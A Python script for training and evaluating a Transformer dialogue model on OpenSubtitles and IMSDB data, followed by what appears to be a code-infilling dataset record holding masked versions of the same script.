def run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):
mylogger.log_info('Running Model')
for i in range(niter):
mylogger.log_info(f'EPOCH: {i}, lr: {optimizer.state_dict()["param_groups"][0]["lr"]}')
train(i, model, train_loader, criterion, optimizer, scheduler)
eval(i, model, eval_loader, criterion, beam_size=opt.beam)
def convert_ids_to_seq(id_seq, vocab_bulider):
return [vocab_bulider.id_to_word(idx) for idx in id_seq]
def show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):
for in_id, out_id, out_len, gold_id in zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth):
in_seq = convert_ids_to_seq(in_id, vocab_bulider)
out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else out_id, vocab_bulider)
gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)
writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:get_index(in_seq, '<pad>')]), global_step=step)
writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq), global_step=step)
writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:get_index(in_seq, '<pad>')]), global_step=step)
if __name__ == '__main__':
begin_time = time.strftime("%H%M%S", time.localtime())
model_name = 'transformer' + begin_time
opt = parse_args()
device = "cuda" if torch.cuda.is_available() else "cpu"
torch.cuda.set_device(opt.gpuid)
init_seed(opt.manualSeed)
ACCUMULATION = opt.batchsize // opt.realbatch
mylogger = LogManager(checkpoint_step=10,
save_dir='./save',
model_name=model_name,
log_file_name=model_name + '.log',
mode='max', device=device)
mylogger.save_args(opt)
writer = SummaryHelper(save_dir='./save', model_name=model_name)
train_data_dir = './data/opensubtitles'
# train_data_dir = './data/wmt15en-de'
vocab_file_list = ['dialogue_length3_6.post']
# vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']
vocab_bulider = VocabBulider(
train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,
vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)
print('most common 50:', vocab_bulider.most_common(50))
mylogger.log_info('vocab size: %d' % len(vocab_bulider))
# metircs
bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)
distinct_1 = DistinctNGram(ngram=1)
distinct_2 = DistinctNGram(ngram=2)
# train dataset and dataloader
if opt.cotk: # use dataset in paper 'cotk'
# opensub_file_name_list = ['all_de-en.bpe']
opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']
unk_token = None
else: # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'
opensub_file_name_list = ['dialogue_length3_6']
unk_token = 'UNknown'
opensub_dataset = OpenSubDataset(
data_dir=train_data_dir, vocab_bulider=vocab_bulider,
file_name_list=opensub_file_name_list, unk_token='UNknown',
save_process=False, samples=opt.trainsamples, add_bos=True, add_eos=True)
print(opensub_dataset.sample())
opensub_dataloader = DataLoader(
opensub_dataset, batch_size=opt.realbatch,
collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
shuffle=True, num_workers=opt.workers, drop_last=True)
# dev set
dev_data_dir = './data/imsdb'
imsdb_file_name_list = ['imsdb_lower']
# dev_data_dir = './data/wmt15en-de'
# imsdb_file_name_list = ['newstest']
imsdb_dataset = IMSDBDataset(
data_dir=dev_data_dir, vocab_bulider=vocab_bulider,
file_name_list=imsdb_file_name_list, save_process=False,
samples=opt.validsamples, add_bos=True, add_eos=True)
print(imsdb_dataset.sample())
imsdb_dataloader = DataLoader(
imsdb_dataset, batch_size=1,
collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
shuffle=False, num_workers=opt.workers, drop_last=True)
# model definition
if opt.mine:
model = Transformer(
ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,
activation='relu', use_vocab_attn=False, use_pos_attn=False,
relative_clip=0, highway=False, device=device, max_sent_length=32,
share_input_output_embedding=False, share_encoder_decoder_embedding=True,
share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
else:
model = TransformerTorch(
ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,
activation='relu', use_vocab_attn=False, use_pos_attn=False,
relative_clip=0, highway=False, device=device, max_sent_length=32,
share_input_output_embedding=False, share_encoder_decoder_embedding=True,
share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
model.show_graph()
if opt.half:
model = model.half()
if opt.ft:
model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)
# optimizer and scheduler
if opt.warmup:
optimizer = RAdam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)
rate_ratio = 1. / math.sqrt(opt.embedsize)
# top_lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step
scheduler = optim.lr_scheduler.LambdaLR(
optimizer,
lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))
else:
optimizer = RAdam(
filter(lambda p: p.requires_grad, model.parameters()),
lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,
weight_decay=opt.weight_decay)
scheduler = optim.lr_scheduler.StepLR(
optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)
# loss function
# criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid) # for Transformer
criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)
# run model
global_train_step, global_valid_step = 0, 0
run_model(
model, opensub_dataloader, imsdb_dataloader,
opt.niter, criterion, optimizer, scheduler)
writer.close()
|
normal
|
{
"blob_id": "bc6c3383684cbba775d17f81ead3346fe1a01f90",
"index": 5102,
"step-1": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\n<mask token>\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n )\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\n<mask token>\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n )\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\n<mask token>\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n )\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\ndef convert_ids_to_seq(id_seq, vocab_bulider):\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef train(epoch, model, dataloader, criterion, optimizer, scheduler):\n global global_train_step\n model.train()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0),\n desc='train', total=len(opensub_dataset) // opt.realbatch):\n tgt_input = tgt[:, :-1]\n tgt_gold = tgt[:, 1:]\n tgt_lens = tgt_lens - 1\n decoder_output_probs, _ = model(src=src, tgt=tgt_input, src_lengths\n =src_lens, tgt_lengths=tgt_lens)\n decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)\n out_seqs = torch.argmax(decoder_output_probs, dim=2)\n loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION\n loss.backward()\n total_loss += loss.item()\n bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)\n distinct_1_score += distinct_1(out_seqs, tgt_lens)\n distinct_2_score += distinct_2(out_seqs, tgt_lens)\n global_train_step += 1\n writer.log_loss(loss.item() * ACCUMULATION, mode='train')\n if (i + 1) % ACCUMULATION == 0:\n optimizer.step()\n optimizer.zero_grad()\n scheduler.step()\n if (i + 1) % opt.logstep == 0:\n avg_loss = total_loss / opt.logstep * ACCUMULATION\n avg_bleu = bleu_score / opt.logstep\n avg_distinct_1 = distinct_1_score / opt.logstep\n avg_distinct_2 = distinct_2_score / opt.logstep\n mylogger.log(i, epoch, model, value=avg_loss, is_train=True,\n info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2],\n vocab_bulider, global_train_step, mode='train')\n\n\ndef eval(epoch, model, dataloader, criterion, beam_size=2):\n global global_valid_step\n model.eval()\n criterion.eval()\n total_loss = 0.0\n bleu_score = 0.0\n distinct_1_score, distinct_2_score = 0.0, 0.0\n fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' +\n str(epoch)), 'w', encoding='utf-8')\n with torch.no_grad():\n for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader,\n 0), desc='eval', total=len(imsdb_dataset)):\n tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)\n tgt_gold = tgt[:, 1:]\n if beam_size > 1:\n output_seqs, output_probs = model.beam_search(src=src,\n tgt_begin=tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], beam_size=beam_size, max_length\n =tgt_lens.item())\n else:\n output_seqs, output_probs = model.greedy(src=src, tgt_begin\n =tgt_begin, src_length=src_lens, eos_token_id=\n vocab_bulider['<eos>'], max_length=tgt_lens.item())\n min_len = min(tgt_gold.shape[1], output_seqs.shape[1])\n loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1),\n tgt_gold[:, :min_len])\n total_loss += loss.item()\n out_lens = [min_len]\n bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)\n distinct_1_score += distinct_1(output_seqs, out_lens)\n distinct_2_score += distinct_2(output_seqs, out_lens)\n global_valid_step += 1\n fout.write(' '.join(convert_ids_to_seq(output_seqs[0],\n vocab_bulider)) + '\\n')\n if (i + 1) % opt.logstep == 0:\n show_gen_seq(src, output_seqs, out_lens, tgt_gold,\n vocab_bulider, global_valid_step, mode='valid')\n avg_loss = total_loss / i\n avg_bleu = bleu_score / i\n avg_distinct_1 = distinct_1_score / i\n avg_distinct_2 = distinct_2_score / i\n writer.log_loss(avg_loss, mode='valid')\n mylogger.log(i, epoch, model, value=avg_bleu, is_train=False, info=\n f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}'\n )\n fout.close()\n\n\ndef run_model(model, train_loader, eval_loader, niter, criterion, optimizer,\n scheduler):\n mylogger.log_info('Running Model')\n for i in range(niter):\n mylogger.log_info(\n f\"EPOCH: {i}, lr: {optimizer.state_dict()['param_groups'][0]['lr']}\"\n )\n train(i, model, train_loader, criterion, optimizer, scheduler)\n eval(i, model, eval_loader, criterion, beam_size=opt.beam)\n\n\ndef convert_ids_to_seq(id_seq, vocab_bulider):\n return [vocab_bulider.id_to_word(idx) for idx in id_seq]\n\n\ndef show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth,\n vocab_bulider, step, mode='train'):\n for in_id, out_id, out_len, gold_id in zip(batch_in_seqs,\n batch_out_seqs, batch_out_lens, groud_truth):\n in_seq = convert_ids_to_seq(in_id, vocab_bulider)\n out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else\n out_id, vocab_bulider)\n gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)\n writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq),\n global_step=step)\n writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:\n get_index(in_seq, '<pad>')]), global_step=step)\n\n\nif __name__ == '__main__':\n begin_time = time.strftime('%H%M%S', time.localtime())\n model_name = 'transformer' + begin_time\n opt = parse_args()\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n torch.cuda.set_device(opt.gpuid)\n init_seed(opt.manualSeed)\n ACCUMULATION = opt.batchsize // opt.realbatch\n mylogger = LogManager(checkpoint_step=10, save_dir='./save', model_name\n =model_name, log_file_name=model_name + '.log', mode='max', device=\n device)\n mylogger.save_args(opt)\n writer = SummaryHelper(save_dir='./save', model_name=model_name)\n train_data_dir = './data/opensubtitles'\n vocab_file_list = ['dialogue_length3_6.post']\n vocab_bulider = VocabBulider(train_data_dir, src_files=vocab_file_list,\n ignore_unk_error=True, vocab_file='vocab.txt', min_count=opt.\n mincount, update=opt.update)\n print('most common 50:', vocab_bulider.most_common(50))\n mylogger.log_info('vocab size: %d' % len(vocab_bulider))\n bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error\n =True)\n distinct_1 = DistinctNGram(ngram=1)\n distinct_2 = DistinctNGram(ngram=2)\n if opt.cotk:\n opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test',\n 'opensub_pair_train']\n unk_token = None\n else:\n opensub_file_name_list = ['dialogue_length3_6']\n unk_token = 'UNknown'\n opensub_dataset = OpenSubDataset(data_dir=train_data_dir, vocab_bulider\n =vocab_bulider, file_name_list=opensub_file_name_list, unk_token=\n 'UNknown', save_process=False, samples=opt.trainsamples, add_bos=\n True, add_eos=True)\n print(opensub_dataset.sample())\n opensub_dataloader = DataLoader(opensub_dataset, batch_size=opt.\n realbatch, collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid,\n device=device), shuffle=True, num_workers=opt.workers, drop_last=True)\n dev_data_dir = './data/imsdb'\n imsdb_file_name_list = ['imsdb_lower']\n imsdb_dataset = IMSDBDataset(data_dir=dev_data_dir, vocab_bulider=\n vocab_bulider, file_name_list=imsdb_file_name_list, save_process=\n False, samples=opt.validsamples, add_bos=True, add_eos=True)\n print(imsdb_dataset.sample())\n imsdb_dataloader = DataLoader(imsdb_dataset, batch_size=1, collate_fn=\n PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),\n shuffle=False, num_workers=opt.workers, drop_last=True)\n if opt.mine:\n model = Transformer(ntoken=len(vocab_bulider), d_model=opt.\n embedsize, nhead=opt.nhead, num_encoder_layers=opt.encoderlayer,\n num_decoder_layers=opt.decoderlayer, dim_feedforward=opt.\n feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.\n gumbels, use_src_mask=False, use_tgt_mask=True, use_memory_mask\n =False, activation='relu', use_vocab_attn=False, use_pos_attn=\n False, relative_clip=0, highway=False, device=device,\n max_sent_length=32, share_input_output_embedding=False,\n share_encoder_decoder_embedding=True, share_vocab_embedding=\n True, fix_pos_encoding=opt.fix).to(device)\n else:\n model = TransformerTorch(ntoken=len(vocab_bulider), d_model=opt.\n embedsize, nhead=opt.nhead, num_encoder_layers=opt.encoderlayer,\n num_decoder_layers=opt.decoderlayer, dim_feedforward=opt.\n feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.\n gumbels, use_src_mask=False, use_tgt_mask=False,\n use_memory_mask=False, activation='relu', use_vocab_attn=False,\n use_pos_attn=False, relative_clip=0, highway=False, device=\n device, max_sent_length=32, share_input_output_embedding=False,\n share_encoder_decoder_embedding=True, share_vocab_embedding=\n True, fix_pos_encoding=opt.fix).to(device)\n model.show_graph()\n if opt.half:\n model = model.half()\n if opt.ft:\n model = restore_best_state(model, opt.ckpt, save_dir='./save',\n device=model.device)\n if opt.warmup:\n optimizer = RAdam(filter(lambda p: p.requires_grad, model.\n parameters()), lr=1.0, betas=(opt.beta1, opt.beta2), eps=opt.eps)\n rate_ratio = 1.0 / math.sqrt(opt.embedsize)\n scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda\n step: rate_ratio * min(1.0 / math.sqrt(step + 1), step * opt.\n warmup_step ** -1.5))\n else:\n optimizer = RAdam(filter(lambda p: p.requires_grad, model.\n parameters()), lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt\n .eps, weight_decay=opt.weight_decay)\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=opt.\n schedulerstep, gamma=opt.gamma)\n criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=\n vocab_bulider.padid)\n global_train_step, global_valid_step = 0, 0\n run_model(model, opensub_dataloader, imsdb_dataloader, opt.niter,\n criterion, optimizer, scheduler)\n writer.close()\n",
